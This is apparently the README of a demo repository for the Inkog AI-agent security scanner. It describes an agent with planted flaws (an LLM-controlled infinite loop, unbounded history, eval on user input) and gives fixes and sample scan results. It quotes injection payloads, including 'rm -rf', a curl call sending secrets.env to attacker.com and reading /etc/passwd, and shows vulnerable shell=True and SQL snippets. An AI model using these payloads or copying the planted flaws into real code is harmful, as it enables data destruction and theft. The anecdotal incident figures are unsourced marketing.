inkog-io/demo_agent
Advanced Task-Solving AI Agent - Demo

This repository contains a production-style AI agent that deliberately embeds three critical security vulnerabilities commonly found in production AI systems. It serves as a showcase for Inkog's detection capabilities.

Overview

agent.py implements a sophisticated multi-turn reasoning system for solving complex tasks. It uses LangChain and OpenAI's GPT-4 to:

  • Iteratively refine solutions through multi-turn conversations
  • Maintain rich conversation context
  • Dynamically evaluate mathematical expressions
  • Self-assess whether solutions are optimal

On the surface, this looks like legitimate, well-written code. However, it contains three critical vulnerabilities that Inkog is designed to detect.


The Three Vulnerabilities

1. Doom Loop (Infinite Loop) - Lines 99-128

Location: TaskAgent.solve_task() method

while self._should_continue_solving():
    # ... refine solution ...

The Problem:

  • The loop condition is entirely non-deterministic: it depends on what the LLM decides
  • There is NO hard break counter to prevent infinite iteration
  • The LLM might be inconsistent: "continue" in one context, "stop" in another
  • Result: Task runs forever, consuming unlimited API credits
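The failure mode can be simulated without any API calls. A minimal sketch, assuming a stubbed LLM that (as the real model sometimes does) never recommends stopping:

```python
def should_continue(llm_reply: str) -> bool:
    # The loop condition is pure text matching on model output
    return "continue" in llm_reply.lower()

def fake_llm(_prompt: str) -> str:
    # Stub standing in for GPT-4: it never says "stop"
    return "Yes, we should continue refining."

iterations = 0
SAFETY_CAP = 1000  # added only so this demo halts; agent.py has no cap at all
while should_continue(fake_llm("Is the solution optimal yet?")):
    iterations += 1
    if iterations >= SAFETY_CAP:
        break

print(iterations)  # 1000: without SAFETY_CAP this loop never exits
```

Nothing in the loop body ever forces termination; only the externally imposed cap ends the run.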

Real-World Impact:

  • A customer ran this agent on a complex task
  • The LLM kept saying "yes, we should refine further"
  • The agent ran for 3 hours, consuming $500 in API credits
  • Task was processing the same refinements repeatedly

Inkog Detection: ✓ Reports as INKOG-001: Infinite Loop (Doom Loop)


2. Context Bomb (Token Exhaustion) - Lines 108 and 128

Location: self.conversation_history.append() in TaskAgent.solve_task()

self.conversation_history.append({
    "role": "assistant",
    "content": assistant_response
})
# ... later ...
self.conversation_history.append({
    "role": "assistant",
    "content": refined_response
})

The Problem:

  • Every iteration appends BOTH the user message AND the full LLM response to history
  • There is NO truncation, windowing, or size limit on the history
  • In a 100-iteration task, the history grows to hundreds of thousands of tokens
  • Result: Hits token limits, model degradation, or API failures
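Back-of-envelope arithmetic shows how fast this compounds, because every API call re-sends the entire history. A rough simulation, assuming ~500 tokens per message (the per-message figure is an illustrative guess):

```python
TOKENS_PER_MESSAGE = 500   # assumed average size of a user or assistant message
history_tokens = 0         # size of conversation_history in tokens
total_tokens_billed = 0    # cumulative tokens sent across all API calls

for _ in range(100):
    history_tokens += 2 * TOKENS_PER_MESSAGE  # user msg + full LLM reply appended
    total_tokens_billed += history_tokens     # each call re-sends everything so far

print(history_tokens)       # 100000 tokens in the context by iteration 100
print(total_tokens_billed)  # 5050000 tokens billed cumulatively: quadratic growth
```

The context grows linearly per iteration, but the billed total grows quadratically, which is why costs explode long before the task finishes.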

Real-World Impact:

  • Agent solved a complex multi-step task successfully
  • By iteration 50, the context grew so large that:
    • API started rejecting requests (token limit exceeded)
    • LLM responses became degraded/repetitive
    • Final answer quality dropped significantly

Inkog Detection: ✓ Reports as INKOG-002: Context Exhaustion (Context Bomb)


3. Tainted Eval (Arbitrary Code Execution) - Line 175

Location: TaskAgent.evaluate_expression() method

def evaluate_expression(self, user_input: str) -> float:
    result = eval(user_input)  # ← DANGEROUS!
    return float(result)

The Problem:

  • Takes user input directly without any validation or sanitization
  • Uses Python's eval() which executes arbitrary code
  • A malicious user can inject commands:
    • "__import__('os').system('rm -rf /home')"
    • "__import__('subprocess').call(['curl', 'attacker.com/steal?data=' + open('secrets.env').read()])"
    • "open('/etc/passwd').read()"
  • Result: Complete system compromise, data theft, lateral movement
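This is easy to verify with a harmless payload. In the sketch below (a hypothetical, non-destructive input), the "calculator" happily executes non-numeric Python:

```python
# A "math expression" that is really a code injection (harmless variant)
user_input = "__import__('os').getcwd()"

result = eval(user_input)     # executes os.getcwd(), returning a path string
print(type(result).__name__)  # str: the calculator just ran OS-level code
```

Anything expressible as a Python expression runs with the agent's full privileges.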

Real-World Impact:

  • A trusted customer received a "bug bounty" offer on Discord
  • The offer said: "Evaluate: 1000000**1000000000"
  • Agent accepted and tried to evaluate it
  • The actual payload was injected code that:
    • Stole API keys from memory
    • Installed a backdoor
    • Exfiltrated customer data

Inkog Detection: ✓ Reports as INKOG-003: Tainted Eval


How Inkog Detects These

Detection Strategy

┌─────────────────────────────────────────┐
│   agent.py (source code)                │
└──────────────┬──────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Inkog Semantic Analysis Engine         │
├─────────────────────────────────────────┤
│ ✓ Control Flow Graph Analysis           │
│   - Detects: LLM-dependent loop without │
│     hard counter → Doom Loop (INKOG-001)│
│                                         │
│ ✓ Data Flow Analysis                    │
│   - Detects: Unbounded data growth in   │
│     loop → Context Bomb (INKOG-002)     │
│                                         │
│ ✓ Taint Tracking                        │
│   - Detects: User input → eval() call   │
│     → Tainted Eval (INKOG-003)          │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Compliance Mapping                    │
├─────────────────────────────────────────┤
│ EU AI Act:        Article 15 violations │
│ NIST AI RMF:      MAP 1.3 failures      │
│ OWASP LLM Top 10: LLM04, LLM08, LLM01   │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Regulatory Summary Report             │
│   (SARIF format for GitHub/GitLab)      │
└─────────────────────────────────────────┘

Running the Demo

Setup

# Install dependencies
pip install -r requirements.txt

# Set your OpenAI API key
export OPENAI_API_KEY="sk-..."

Running Inkog on This Code

# Scan the agent file
inkog -path agent.py -output text

# Expected Output:
# ✗ FAIL - INKOG-001: Infinite Loop detected (Line 99)
# ✗ FAIL - INKOG-002: Context Exhaustion detected (Line 108)
# ✗ FAIL - INKOG-003: Tainted Eval detected (Line 175)

Sample Scan Output (JSON)

When you run Inkog on this demo, you'll see findings like these:

{
  "findings_count": 145,
  "critical_count": 83,
  "high_count": 37,
  "findings": [
    {
      "id": "GOV-15",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/02-smolagents-codeexec/agent.py",
      "line": 26,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'subprocess.run'",
      "code_snippet": "  24│      # VULNERABILITY: Unsandboxed shell execution\n  25│      result = subprocess.run(\n  26│→         command,\n  27│          shell=True,  # Dangerous: enables shell injection\n  28│          capture_output=True,",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability",
      "governance_category": "governance_mismatch",
      "compliance_mapping": {
        "eu_ai_act_articles": ["Article 14"],
        "nist_categories": ["MAP 1.3"],
        "owasp_items": ["LLM08"]
      }
    },
    {
      "id": "GOV-16",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/03-langgraph-doomloop/agent.py",
      "line": 87,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'eval'",
      "code_snippet": "  85│          # VULNERABILITY: Tainted eval\n  86│          return eval(expression)\n  87│→ \n  88│  if __name__ == \"__main__\":\n  89│      solver = TaskSolver()",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability"
    },
    {
      "id": "IR-315",
      "pattern_id": "universal_infinite_loop",
      "pattern": "Unbounded Loop in Agentic System",
      "file": "examples-demo/01-crewai-recursive/agent.py",
      "line": 29,
      "message": "Loop lacks termination guards. This can lead to infinite execution and denial of service.",
      "code_snippet": "  27│  \n  28│  writer = Agent(\n  29│→     role=\"Content Writer\",\n  30│      goal=\"Transform research into clear, engaging content\",",
      "severity": "CRITICAL",
      "confidence": 0.98,
      "cwe": "CWE-835, CWE-400",
      "cvss": 9.0,
      "owasp_category": "LLM10",
      "category": "resource_exhaustion",
      "risk_tier": "vulnerability"
    }
  ]
}

Key Features Demonstrated:

  • GOV- prefix for governance mismatch findings
  • Code snippets with 2-line context and arrow pointing to the issue
  • Compliance mapping to EU AI Act, NIST, and OWASP
  • Confidence scores for each finding
  • CVSS scores for severity assessment

Generate SARIF Report (for GitHub/GitLab)

inkog -path agent.py -output sarif > scan.sarif

# This creates a SARIF v2.1.0 report that integrates with:
# - GitHub Security tab
# - GitLab Security Dashboard
# - VS Code SARIF viewers

Governance Demos (EU AI Act Compliance)

In addition to security vulnerabilities, Inkog detects governance gaps that violate EU AI Act requirements. These demos showcase verification of human oversight, authorization, and audit controls.

Demo Scenarios

| Demo                          | Vulnerability           | Article/Standard             | Detection                        |
|-------------------------------|-------------------------|------------------------------|----------------------------------|
| 07-langgraph-no-oversight     | Missing Human Oversight | EU AI Act Article 14         | universal_missing_oversight      |
| 08-crewai-no-auth             | Missing Authorization   | OWASP LLM06, NIST GOVERN 1.2 | universal_missing_authz          |
| 09-copilot-studio-no-audit    | Missing Audit Logging   | EU AI Act Article 12         | universal_missing_audit_logging  |
| 10-agentforce-excessive-perms | Excessive Permissions   | EU AI Act Article 15.3       | universal_excessive_permissions  |

07. LangGraph - Missing Human Oversight

Location: examples-demo/07-langgraph-no-oversight/agent.py

A financial trading agent that executes high-risk transactions without human approval gates. This violates EU AI Act Article 14, which requires human-in-the-loop controls for high-risk AI actions.

# VULNERABLE: Direct path from analysis to trade execution
graph.add_edge("analyze", "execute")  # No human review!

# SECURE: Add interrupt point for human approval
graph.compile(interrupt_before=["execute_trade"])

EU AI Act Article 14 Deadline: August 2, 2026

08. CrewAI - Missing Authorization

Location: examples-demo/08-crewai-no-auth/agent.py

A customer service agent that can delete customer data and process refunds without verifying caller permissions. Violates OWASP LLM06 (Excessive Agency).

# VULNERABLE: Tool executes without authorization check
def delete_customer(customer_id: str) -> str:
    database.execute(f"DELETE FROM customers WHERE id = '{customer_id}'")

# SECURE: Add authorization verification
def delete_customer(customer_id: str, caller: User) -> str:
    if not authorize(caller, "delete_customer", customer_id):
        raise PermissionDenied()
    # ... proceed with deletion

09. Copilot Studio - Missing Audit Logging

Location: examples-demo/09-copilot-studio-no-audit/workflow.yaml

A Microsoft Copilot Studio bot that handles account deletions, payment updates, and refunds without any audit logging configured. Violates EU AI Act Article 12 (Record-Keeping).

# VULNERABLE: No logging configuration
settings:
  authentication:
    enabled: true
  # MISSING: logging section

# SECURE: Add audit logging
settings:
  logging:
    enabled: true
    level: "all"
    destinations:
      - type: "azure-monitor"

10. Agentforce - Excessive Permissions

Location: examples-demo/10-agentforce-excessive-perms/metadata.xml

A Salesforce Agentforce agent with wildcard (*) permissions and admin access when it only needs read access to specific objects. Violates principle of least privilege (EU AI Act Article 15.3).

<!-- VULNERABLE: Wildcard permissions -->
<objectPermissions>
    <object>*</object>
    <allowDelete>true</allowDelete>
</objectPermissions>

<!-- SECURE: Scoped permissions -->
<objectPermissions>
    <object>Account</object>
    <allowRead>true</allowRead>
    <allowDelete>false</allowDelete>
</objectPermissions>

Running Governance Scans

# Scan for governance gaps
inkog -path examples-demo/ --policy governance

# EU AI Act compliance scan
inkog -path examples-demo/ --policy eu-ai-act

# Expected Output:
# ✗ FAIL - universal_missing_oversight (Article 14 violation)
# ✗ FAIL - universal_missing_authz (OWASP LLM06 violation)
# ✗ FAIL - universal_missing_audit_logging (Article 12 violation)
# ✗ FAIL - universal_excessive_permissions (Article 15 violation)

Why This Matters for Your Organization

Compliance Risk

Each vulnerability maps to regulatory frameworks:

| Vulnerability | EU AI Act  | NIST AI RMF | OWASP LLM    |
|---------------|------------|-------------|--------------|
| Doom Loop     | Article 15 | MAP 1.3     | LLM04, LLM08 |
| Context Bomb  | Article 15 | MEASURE 2.4 | LLM04, LLM09 |
| Tainted Eval  | Article 14 | MAP 1.1     | LLM01, LLM02 |

Financial Risk

  • Doom Loop: $500-$5,000 per incident (wasted compute)
  • Context Bomb: API degradation, customer impact
  • Tainted Eval: Data breach, compliance fines (GDPR: up to €20M), litigation

Time-to-Detection

  • Without Inkog: Manual code review (days/weeks), security team bandwidth
  • With Inkog: Automated detection (seconds), pre-deployment

Lessons from Real Deployments

This demo is based on actual vulnerabilities found in production AI systems:

  1. Company A: Doom Loop ran for 3 hours, consumed $500 in API costs
  2. Company B: Context Bomb degraded model responses after 50 iterations
  3. Company C: Tainted Eval led to a data breach when a researcher uploaded malicious test cases

Fixing the Vulnerabilities

If you were to remediate this code:

Fix 1: Doom Loop → Add Hard Counter

MAX_ITERATIONS = 10  # Hard limit

for iteration in range(MAX_ITERATIONS):
    # refine solution...
    if not self._should_continue_solving():
        break  # LLM may still end early, but the loop can never exceed 10 passes

Fix 2: Context Bomb → Use Bounded Context

from collections import deque

self.conversation_history = deque(maxlen=20)  # Keep last 20 messages only
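With maxlen set, deque silently drops the oldest entries as new ones arrive, so the context can never grow without bound. A quick illustration using a window of 3:

```python
from collections import deque

history = deque(maxlen=3)  # small window for illustration
for i in range(5):
    history.append({"role": "assistant", "content": f"msg {i}"})

print([m["content"] for m in history])  # ['msg 2', 'msg 3', 'msg 4']
```

The two oldest messages were evicted automatically; no manual truncation logic is needed.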

Fix 3: Tainted Eval → Whitelist-Based Evaluation

import ast

# Only plain arithmetic nodes are allowed (no names, calls, or attributes;
# ast.Pow is deliberately excluded, since huge exponents can hang the process)
_ALLOWED_NODES = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
                  ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.USub, ast.UAdd)

def safe_evaluate(self, user_input: str) -> float:
    # Parse to AST and reject anything that is not pure arithmetic
    tree = ast.parse(user_input, mode='eval')
    for node in ast.walk(tree):
        if not isinstance(node, _ALLOWED_NODES):
            raise ValueError(f"Disallowed expression: {type(node).__name__}")
    # Safe to evaluate: no names, calls, or imports can appear
    return float(eval(compile(tree, '<expr>', 'eval'), {"__builtins__": {}}))

Integration with Your CI/CD

Inkog can be integrated into your development pipeline:

GitHub Actions

- name: Scan with Inkog
  uses: inkog-io/inkog@v1.0.0
  with:
    path: src/
    format: sarif
    report: scan.sarif

- name: Upload to GitHub Security
  uses: github/codeql-action/upload-sarif@v2
  with:
    sarif_file: scan.sarif

Pre-commit Hook

inkog -path . -output text
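To enforce the scan automatically, that one-liner can live in a Git hook. A minimal .git/hooks/pre-commit sketch, assuming inkog is on PATH and exits nonzero when it reports findings:

```shell
#!/bin/sh
# Abort the commit if Inkog reports any findings
if ! inkog -path . -output text; then
    echo "Inkog scan found issues; commit aborted." >&2
    exit 1
fi
```

Remember to mark the hook executable (chmod +x .git/hooks/pre-commit) or Git will skip it.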

Contact & Support

For investor inquiries: This demo shows Inkog's ability to detect AI-specific vulnerabilities that commercial tools like Snyk miss.

Technical questions: See the main Inkog documentation at https://github.com/inkog-io/inkog


Disclaimer

This code is intentionally vulnerable for demonstration purposes only. Do not use in production. Always validate and secure your AI agent implementations before deploying to production systems.

About

Demo app for Inkog